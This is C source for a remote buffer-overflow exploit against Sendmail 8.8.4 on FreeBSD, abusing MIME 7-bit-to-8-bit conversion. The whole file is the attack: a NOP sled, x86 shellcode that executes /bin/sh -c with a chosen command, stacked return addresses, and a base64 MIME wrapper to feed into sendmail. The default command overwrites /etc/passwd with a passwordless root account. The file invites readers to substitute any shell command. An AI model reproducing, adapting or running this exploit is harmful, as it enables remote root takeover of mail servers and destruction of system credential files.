FreeBSD Sendmail 8.8.4 mime 7to8 remote exploit.
3026d76cd6cb15ace5c52d53c41a42d7e7c68d1c3c01f24851a28d0322a18da5
/*
sendmail 8.8.4, freebsd, mime 7to8, remote
I checked this only at home, at custom installed 8.8.4.
I have no freebsd with preinstaled 8.8.4 around.
change cmd[] below to shell command you want, and throw output to sendmail
*/
#include <stdlib.h>
#include <fcntl.h>
#define BUFSIZE 6100
#define OFFS -5000
#define ALIGN 0
#define ADDRS 15
int get_sp(void) {
/* __asm__(" movl %esp,%eax"); */
return 0xefbf95e4;
}
/* up to 220 bytes */
char cmd[]="echo 'h::0:0:/tmp:/bin/bash > /etc/passwd'";
char asmcode[]="\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89"
"\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46"
"\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17"
"\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b"
"\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
"\x02\x02\x02\x02\x02\x02\x2f\x62\x69\x6e\x2f\x73"
"\x68\x2e\x2d\x63\x2e";
char nop[]="\x90";
char Base64Table[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
void run(unsigned char *buf) {
unsigned int i, j, k;
printf("MIME-Version: 1.0\n");
printf("Content-Type: text/plain\n");
printf("Content-Transfer-Encoding: base64\n");
k=strlen(buf) / 3 * 3;
for (i=0; i < k; i+=3) {
j=(buf[i] << 16) + (buf[i+1] << 8) + buf[i+2];
if (i % 54 == 0)
printf("\n");
printf("%c", Base64Table[(j & 0xfc0000) >> 18]);
printf("%c", Base64Table[(j & 0x03f000) >> 12]);
printf("%c", Base64Table[(j & 0x000fc0) >> 6]);
printf("%c", Base64Table[j & 0x00003f]);
}
switch (strlen(buf) - k) {
case 1: printf("%c%c==", Base64Table[(buf[k] & 0xfc) >> 2],
Base64Table[(buf[k] & 0x3) << 4]);
break;
case 2: printf("%c%c%c=", Base64Table[(buf[k] & 0xfc) >> 2],
Base64Table[((buf[k] & 0x3) << 4)+((buf[k+1] & 0xf0) >> 4)],
Base64Table[(buf[k+1] & 0xf) << 2]);
break;
default:
}
printf("\n");
}
char code[sizeof(asmcode) + sizeof(cmd)];
main(int argc, char *argv[]) {
char *buf, *ptr, addr[8];
int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS;
int i, noplen=strlen(nop);
if (argc >1) bufsize=atoi(argv[1]);
if (argc >2) offs=atoi(argv[2]);
if (argc >3) addrs=atoi(argv[3]);
strcpy(code, asmcode);
strncat(code, cmd);
strncat(code, ".");
code[41]=0x1a+strlen(cmd)+1;
if (bufsize<strlen(code)) {
printf("bufsize too small, code is %d bytes long\n", strlen(asmcode));
exit(1);
}
if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL) {
printf("Can't malloc\n");
exit(1);
}
*(int *)addr=get_sp()+offs;
printf("address - %p\n", *(int *)addr);
ptr=buf;
for (i=0; i<bufsize; i++)
*ptr++=nop[i % noplen];
memcpy(ptr-strlen(code), code, strlen(code));
for (i=0; i<addrs<<2; i++)
*ptr++=addr[i % sizeof(int)];
*ptr=0;
printf("total buf len - %d\n", strlen(buf));
run(buf);
}
/* www.hack.co.za */